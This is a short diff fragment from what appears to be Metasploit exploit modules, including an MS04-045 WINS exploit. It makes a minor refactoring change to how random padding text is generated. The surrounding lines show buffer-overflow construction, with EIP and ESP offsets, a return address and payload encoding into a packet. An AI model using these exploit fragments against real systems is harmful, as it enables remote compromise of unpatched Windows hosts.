|
||||||
print_status("The CAM service is not responding")
|
print_status("The CAM service is not responding")
|
||||||
end
|
end
|
||||||
|
|
||||||
buf = Rex::Text.rand_text_english(4096, payload_badchars)
|
buf = rand_text_english(4096, payload_badchars)
|
||||||
|
|
||||||
# Offset 1016 for EIP, 1024 = ESP, 1052 = ESI
|
# Offset 1016 for EIP, 1024 = ESP, 1052 = ESI
|
||||||
buf[ 1016, 4 ] = [target.ret].pack('V')
|
buf[ 1016, 4 ] = [target.ret].pack('V')
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -121,7 +121,7 @@ class Exploits::Windows::Wins::MS04_045 < Msf::Exploit::Remote
|
||||||
|
|
||||||
wins = addr * 10
|
wins = addr * 10
|
||||||
wins << payload.encoded
|
wins << payload.encoded
|
||||||
wins << Rex::Text.rand_text_english(9200-wins.length, payload_badchars)
|
wins << rand_text_english(9200-wins.length, payload_badchars)
|
||||||
|
|
||||||
wpkt = [wins.length + 8, -1, base].pack('NNN')
|
wpkt = [wins.length + 8, -1, base].pack('NNN')
|
||||||
wpkt << wins
|
wpkt << wins
|
||||||
|
|